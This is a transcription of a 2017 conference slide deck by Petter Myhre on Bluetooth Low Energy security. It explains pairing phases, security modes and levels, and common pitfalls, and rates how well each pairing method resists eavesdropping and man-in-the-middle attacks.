Bluetooth low energy security, how good is it? Petter Myhre Bluetooth World, San Jose March 2017

Similar documents
PM0257. BlueNRG-1, BlueNRG-2 BLE stack v2.x programming guidelines. Programming manual. Introduction

Bluetooth Low Energy Protocol Stack

18733: Applied Cryptography Anupam Datta (CMU) Basic key exchange. Dan Boneh

L13. Reviews. Rocky K. C. Chang, April 10, 2015

Network Encryption 3 4/20/17

Security by Spatial Reference

Auth. Key Exchange. Dan Boneh

Inside Bluetooth Low Energy

DEEP ARMOR. Hands-on Exploitation & Hardening of Wearable and IoT Platforms. Sumanth Naropanth & Sunil Kumar

Computer Security. 10r. Recitation assignment & concept review. Paul Krzyzanowski. Rutgers University. Spring 2018

The case for Usable Mobile Security

Bluetooth Smart: The Good, The Bad, The Ugly... and The Fix

Wi-Fi Security for Next Generation Connectivity. Perry Correll Aerohive, Wi-Fi Alliance member October 2018

Public-Key Cryptography. Professor Yanmin Gong Week 3: Sep. 7

(In)security of ecient tree-based group key agreement using bilinear map

Panasonic PAN1026 Toshiba TC35661

Analyzing the secure simple pairing in Bluetooth v4.0

Diffie-Hellman. Part 1 Cryptography 136

Securing today s identity and transaction systems:! What you need to know! about two-factor authentication!

Bluetooth technology: security features, vulnerabilities and attacks Pasquale Stirparo Jan Loeschner Marco Cattani

MASHaBLE: Mobile Applications of Secret Handshakes over Bluetooth Low-Energy. Yan Michalevsky, Suman Nath, Jie Liu

WAP Security. Helsinki University of Technology S Security of Communication Protocols

Diffie-Hellman Key Agreement

CIS 700/002 : Special Topics : Bluetooth: With Low Energy comes Low Security

Security Association Creation

attack pairing 1 Vishal. Gup pta Naina Mittal Nishant Mishra et al./ International Journal of Computer Science & Engineering Technology (IJCSET)

1. Diffie-Hellman Key Exchange

Key Establishment and Authentication Protocols EECE 412

CS 6324: Information Security More Info on Key Establishment: RSA, DH & QKD

Connecting & Addressing Security Concerns of Bluetooth Technology in Current Scenario

SSH and keys. Network Startup Resource Center

Hacking challenge: steal a car!

CMSC 414 S09 Exam 2 Page 1 of 6 Name:

BlueCore. Operation of Bluetooth v2.1 Devices. Application Note. Issue 7

Mobile Security Fall 2014

Viber Encryption Overview

Man-in-the-Middle Attack and its Countermeasure in Bluetooth Secure Simple Pairing

Verify Printer is Working Power Save Mode Printing a Configuration Label Draft Mode Connecting the Printer

Password. authentication through passwords

Security of Wireless Networks in Intelligent Vehicle Systems

Click to edit Master title style Buzzing Smart Devices

CIS 4360 Secure Computer Systems Applied Cryptography

[MS-ABTP]: Automatic Bluetooth Pairing Protocol. Intellectual Property Rights Notice for Open Specifications Documentation

Cryptography and Network Security. Prof. D. Mukhopadhyay. Department of Computer Science and Engineering. Indian Institute of Technology, Kharagpur

CS 494/594 Computer and Network Security

Real-time protocol. Chapter 16: Real-Time Communication Security

Security Handshake Pitfalls

Security Handshake Pitfalls

CS 161 Computer Security

Erratum 10734: Pairing Updates

In search of CurveSwap: Measuring elliptic curve implementations in the wild

Session key establishment protocols

OpenSSH. 24th February ASBL CSRRT-LU (Computer Security Research and Response Team Luxembourg) 1 / 12

Session key establishment protocols

Intro to Public Key Cryptography Diffie & Hellman Key Exchange

Prepared by the Fortress Technologies, Inc., Government Technology Group 4023 Tampa Rd. Suite Oldsmar, FL 34677

Security Handshake Pitfalls

Understanding Traffic Decryption

Corso di Network Security a.a. 2012/2013. Solutions of exercises on the second part of the course

Security by Any Other Name:

I T S E C U R I T Y K N O W - H O W

Public Key Cryptography

Addressing Credential Compromise & Account Takeovers: Bearersensitive. Girish Chiruvolu, Ph.D., CISSP, CISM, MBA ISACA NTX April 19

CSC 5930/9010 Modern Cryptography: Public Key Cryptography

CSCE 715: Network Systems Security

Telex Anticensorship in the

Outline. Login w/ Shared Secret: Variant 1. Login With Shared Secret: Variant 2. Login Only Authentication (One Way) Mutual Authentication

Security Analysis of Shim s Authenticated Key Agreement Protocols from Pairings

SECURITY STORY WE NEVER SEE, TOUCH NOR HOLD YOUR DATA

MTAT Applied Cryptography

VPN Overview. VPN Types

Intuitive and Sensible Access Control Policies N. Asokan

OCF 2.3 RBSTG: Bridging Security Editorial Cleanup Sec WG CR Legal Disclaimer

Chapter 10 : Private-Key Management and the Public-Key Revolution

Key Encryption as per T10/06-103

Linux Network Administration

Online Cryptography Course. Basic key exchange. Trusted 3 rd par7es. Dan Boneh

Cryptography CS 555. Topic 16: Key Management and The Need for Public Key Cryptography. CS555 Spring 2012/Topic 16 1

Cryptographic Concepts

Authentication Technology for a Smart eid Infrastructure.

Criptext s end-to-end encryption system. Technical white paper

Key Management in Ad-Hoc Networks

MyPGP Graphical User Interface for PGP

COSC 301 Network Management. Lecture 15: SSL/TLS and HTTPS

Life Science Journal 2014;11(3s) Enhanced Authentication Scheme for Proxy Mobile IPv6

Security Analysis of Bluetooth v2.1 + EDR Pairing Authentication Protocol. John Jersin Jonathan Wheeler. CS259 Stanford University.

ECMA-409. NFC-SEC-02: NFC-SEC Cryptography Standard using ECDH-256 and AES-GCM. 2 nd Edition / June Reference number ECMA-123:2009

A NOVEL METHOD FOR BLUETOOTH PAIRING USING STEGANOGRAPHY

Request for Comments: 5422 Category: Informational H. Zhou Cisco Systems March 2009

Cryptography and Network Security Chapter 16. Fourth Edition by William Stallings

TRANSEC BASIC VT idirect, Inc.

Key Agreement. Guilin Wang. School of Computer Science, University of Birmingham

Computer Security. 08. Cryptography Part II. Paul Krzyzanowski. Rutgers University. Spring 2018

Man in the middle. Bởi: Hung Tran

Dr. Jinyuan (Stella) Sun Dept. of Electrical Engineering and Computer Science University of Tennessee Fall 2010

Wireless LAN Security (RM12/2002)

Computer Networks II Advanced Features (T )

Installation and usage of SSL certificates: Your guide to getting it right

Securing Internet Communication: TLS

SECURITY ON PUBLIC WI-FI New Zealand. A guide to help you stay safe online while using public Wi-Fi

Transcription:

Bluetooth low energy security, how good is it? Petter Myhre Bluetooth World, San Jose March 2017

Common Types of Attack Man-In-The-Middle Passive Eavesdropping Man-in-the-Middle (MITM) attack Active eavesdropping Attacker monitors and injects packets Acts as a relay between the two peers Passive Eavesdropping Sniffing packets sent between two peers

Basics Pairing is authenticating another device establishing temporary shared secret keys which can be used to encrypt a link Bonding is pairing followed by distribution of keys which can be used to encrypt the link in

Security Modes and Levels

Security Mode 1 Level 1 No security. No authentication and no encryption Level 2 Unauthenticated pairing with encryption, but no MITM protection Level 3 Authenticated pairing with encryption and MITM protection Level 4 Authenticated LE Secure Connections (LESC) pairing with encryption and possible MITM protection

Security Mode 2 (Not covered) Level 1 Unauthenticated pairing with data signing Level 2 Authenticated pairing with data signing

Authentication and Encryption Procedures Each time 2 devices connect - connection operate in security level 1 no security. Higher level of security achieved by performing: Authentication procedure Unauthenticated pairing results security level 2 Authenticated pairing results in security level 3 or 4 Encryption procedure Connection encrypted with encryption keys already available Typically if keys were shared and stored after previously bonding Original pairing determines achieved security level

Phases Pairing - two phase process, bonding includes a 3rd phase: 2A 1 Legacy Pairing - Short Term Key (STK) Generation 3 Feature Exchange 2B Key Distributi on LESC Long Term Key (LTK) Generation

Phase 1 Feature Exchange Determines: How Phase 2 should be performed If Phase 3 should be performed Features: LESC support Authenticated MITM protection IO Capabilites Out of Band (OOB) authentication data availability Bonding

Phase 2A Legacy Pairing STK Generation Just Works Encryption secure if no attack performed during pairing Security Level 2 Unauthenticated pairing with encryption, but no MITM protection Passkey Entry 6 numeric digits shared between devices using their IO capabilities Provides protection against MITM attacks, very limited protection against eavesdropping during pairing Security Level 3 Authenticated pairing with encryption and MITM protection

Phase 2A Legacy Pairing STK Generation Out-of-Band (OOB) Encryption keys based on data transferred by other means, for example NFC Provides protection, assuming that OOB communication is secure Security Level 3 Authenticated pairing with encryption and MITM protection

LE Secure Connections Added in the Bluetooth Core Specification version 4.2 Provides protection against eavesdropping Provides better protection against MITM attacks FIPS-approved algorithms Uses Elliptic Curve Diffie-Hellman (ECDH) key agreement Allows two peers, each having public-private key pair, to establish shared secret key over insecure channel Secret key used in derivation of encryption keys

Phase 2B LESC LTK Generation Just Works No protection against MITM attacks during pairing Passkey Entry Provides protection Numeric Comparison Provides protection A 6-digit value displayed on both devices and confirmed on both sides by user pressing OK OOB - Provides protection All achieves security level 4 - Authenticated LESC pairing with encryption and possible MITM protection

Phase 3 Key Distribution With bonding following keys can be distributed: Legacy: LTK EDIV Rand IRK LESC IRK

Phases 1 2A Legacy Pairing - Short Term Key (STK) Generation 3 Feature Exchange 2B Key Distributi on LESC Long Term Key (LTK) Generation

Common Pitfalls

Be aware that Security is optional Encryption!= secure Security requirements must be set on characteristic values Static passkey is not the intended use Header not encrypted = Empty packets are not encrypted Keep something open

Application Requirements What kind of security does the application require? What kind of attacks do you want to protect against? Eavesdroppers? MITM attacks? Something else? What kind of security is achieveable? LESC? OOB? IO capabilites? Passkey Entry? Numeric Comparison? Pairing in a safe environment? What about the peers?

How good is it? Legacy Just Works and Passkey Entry secure if paired in a safe environment Legacy OOB - secure if the OOB communcation is safe LESC Just Works - secure if paired in a safe environment - protects against eavesdroppers LESC Numeric Comparison, Passkey Entry - secure LESC OOB secure and most convenient

Bluetooth low energy security, how good is it? Petter Myhre Bluetooth World, San Jose March 2017

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback